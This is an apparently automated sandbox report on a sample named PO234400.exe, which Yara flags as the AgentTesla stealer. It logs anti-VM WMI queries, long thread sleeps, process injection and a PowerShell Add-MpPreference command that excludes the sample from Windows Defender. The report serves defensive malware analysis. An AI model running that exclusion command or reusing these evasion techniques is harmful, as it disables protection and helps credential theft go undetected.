                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Yara detected AntiVM3
                        Source: Yara matchFile source: Process Memory Space: PO234400.exe PID: 7276, type: MEMORYSTR
                        Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                        Source: C:\Users\user\Desktop\PO234400.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Users\user\Desktop\PO234400.exeMemory allocated: 1260000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeMemory allocated: 2F10000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeMemory allocated: 14F0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeMemory allocated: 7B20000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeMemory allocated: 8B20000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeMemory allocated: 8DC0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeMemory allocated: 9DC0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeMemory allocated: 1600000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeMemory allocated: 31D0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeMemory allocated: 51D0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4917Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1674Jump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeWindow / User API: threadDelayed 1362Jump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeWindow / User API: threadDelayed 3363Jump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exe TID: 7304Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7696Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7656Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exe TID: 7692Thread sleep count: 1362 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exe TID: 7692Thread sleep count: 3363 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exe TID: 7708Thread sleep time: -11990383647911201s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exe TID: 7708Thread sleep time: -100000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exe TID: 7708Thread sleep time: -99873s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exe TID: 7708Thread sleep time: -99765s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exe TID: 7708Thread sleep time: -99656s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exe TID: 7708Thread sleep time: -99543s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exe TID: 7708Thread sleep time: -99436s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exe TID: 7708Thread sleep time: -99327s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exe TID: 7708Thread sleep time: -99216s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exe TID: 7708Thread sleep time: -99109s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exe TID: 7708Thread sleep time: -98999s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exe TID: 7708Thread sleep time: -98888s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exe TID: 7708Thread sleep time: -98781s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exe TID: 7708Thread sleep time: -98671s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exe TID: 7708Thread sleep time: -98561s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exe TID: 7708Thread sleep time: -98453s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exe TID: 7708Thread sleep time: -98343s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exe TID: 7708Thread sleep time: -98234s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exe TID: 7708Thread sleep time: -98124s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exe TID: 7708Thread sleep time: -98015s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exe TID: 7708Thread sleep time: -97906s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exe TID: 7708Thread sleep time: -97796s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exe TID: 7708Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Users\user\Desktop\PO234400.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\Desktop\PO234400.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\PO234400.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeThread delayed: delay time: 100000Jump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeThread delayed: delay time: 99873Jump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeThread delayed: delay time: 99765Jump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeThread delayed: delay time: 99656Jump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeThread delayed: delay time: 99543Jump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeThread delayed: delay time: 99436Jump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeThread delayed: delay time: 99327Jump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeThread delayed: delay time: 99216Jump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeThread delayed: delay time: 99109Jump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeThread delayed: delay time: 98999Jump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeThread delayed: delay time: 98888Jump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeThread delayed: delay time: 98781Jump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeThread delayed: delay time: 98671Jump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeThread delayed: delay time: 98561Jump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeThread delayed: delay time: 98453Jump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeThread delayed: delay time: 98343Jump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeThread delayed: delay time: 98234Jump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeThread delayed: delay time: 98124Jump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeThread delayed: delay time: 98015Jump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeThread delayed: delay time: 97906Jump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeThread delayed: delay time: 97796Jump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: PO234400.exe, 00000006.00000002.2606405491.00000000014EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllC:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Adds a directory exclusion to Windows Defender
                        Source: C:\Users\user\Desktop\PO234400.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO234400.exe
                        Source: C:\Users\user\Desktop\PO234400.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO234400.exeJump to behavior
                        Injects a PE file into a foreign processes
                        Source: C:\Users\user\Desktop\PO234400.exeMemory written: C:\Users\user\Desktop\PO234400.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO234400.exeJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess created: C:\Users\user\Desktop\PO234400.exe C:\Users\user\Desktop\PO234400.exeJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess created: C:\Users\user\Desktop\PO234400.exe C:\Users\user\Desktop\PO234400.exeJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeQueries volume information: C:\Users\user\Desktop\PO234400.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeQueries volume information: C:\Users\user\Desktop\PO234400.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Yara detected AgentTesla
                        Source: Yara matchFile source: 0.2.PO234400.exe.418b348.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PO234400.exe.4162328.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.PO234400.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PO234400.exe.418b348.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PO234400.exe.4162328.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000006.00000002.2606062779.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1379891077.00000000040EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 00000006.00000002.2607967300.000000000322A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.2607967300.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: PO234400.exe PID: 7516, type: MEMORYSTR
